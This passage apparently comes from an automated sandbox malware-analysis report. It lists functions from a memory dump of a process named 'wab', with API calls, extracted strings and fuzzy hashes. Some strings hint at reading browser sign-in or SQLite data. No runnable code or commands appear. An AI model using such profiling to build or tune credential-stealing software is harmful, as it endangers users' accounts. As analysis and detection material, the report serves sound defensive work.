                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                                                                      • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                      Uniqueness

